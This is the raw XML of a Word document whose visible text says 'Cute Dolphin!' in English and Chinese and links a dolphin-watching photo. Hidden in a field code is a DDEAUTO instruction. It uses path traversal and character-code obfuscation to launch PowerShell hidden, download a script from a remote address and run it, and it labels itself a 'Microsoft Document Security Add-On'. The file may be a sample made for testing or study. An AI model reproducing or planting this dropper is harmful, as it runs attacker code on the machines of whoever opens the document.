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5B74" w14:textId="1125590D" w:rsidR="004F46EE" w:rsidRDefault="004F46EE" w:rsidP="00DA2F9D">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ute </w:t>
      </w:r>
      <w:r w:rsidR="00FD6F2B">
        <w:t>Dolphin</w:t>
      </w:r>
      <w:r>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371FA9D6" w14:textId="25A672BC" w:rsidR="004F46EE" w:rsidRDefault="004F46EE" w:rsidP="00DA2F9D">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可愛的海豚</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DC45FD" w14:textId="0D56FF11" w:rsidR="004F46EE" w:rsidRPr="004F46EE" w:rsidRDefault="004F46EE" w:rsidP="004F46EE">
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F46EE">
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004F46EE">
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://a.cdn-hotels.com/gdcs/production45/d1414/fe6d1365-6bc5-4413-a21e-9a8e728a271d.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="004F46EE">
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="004F46E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00AD066D" wp14:editId="7065D2DB">
            <wp:extent cx="5274310" cy="3515360"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1" name="圖片 1" descr="Whale and Dolphin Watching in Cebu - See Marine Wildlife in the Philippines  - Go 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le and Dolphin Watching in Cebu - See Marine Wildlife in the Philippines  - Go Guid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6EE">
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3D9AE7" w14:textId="77777777" w:rsidR="001C6455" w:rsidRPr="00EF1248" w:rsidRDefault="001C6455" w:rsidP="001C6455">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DA5542A" w14:textId="16F41E44" w:rsidR="00D24CB7" w:rsidRPr="00EF1248" w:rsidRDefault="00DA2F9D" w:rsidP="001C6455">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF1248">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00DB0DAE" w:rsidRPr="00DB0DAE">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:instrText>DDE</w:instrText>
      </w:r>
      <w:r w:rsidR="009A2ECE">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:instrText>AUTO</w:instrText>
      </w:r>
      <w:r w:rsidR="00DB0DAE" w:rsidRPr="00DB0DAE">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\v1.0\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http://192.168.218.9/download.ps1'); # " "Microsoft Document Security Add-On"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00EF1248">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00EF1248">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1248">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>非預期之公式結尾</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1248">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D24CB7" w:rsidRPr="00EF1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9D"/>
    <w:rsid w:val="001C6455"/>
    <w:rsid w:val="0029186D"/>
    <w:rsid w:val="00445FF9"/>
    <w:rsid w:val="004F46EE"/>
    <w:rsid w:val="00500548"/>
    <w:rsid w:val="006E38E5"/>
    <w:rsid w:val="00776294"/>
    <w:rsid w:val="009A2ECE"/>
    <w:rsid w:val="00D24CB7"/>
    <w:rsid w:val="00DA2F9D"/>
    <w:rsid w:val="00DB0DAE"/>
    <w:rsid w:val="00EF1248"/>
    <w:rsid w:val="00FD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71E47"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F24CEC8C-58B3-3B47-BF50-5CADB718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Chen</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Tyler Chen</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-09-02T10:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-02T11:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>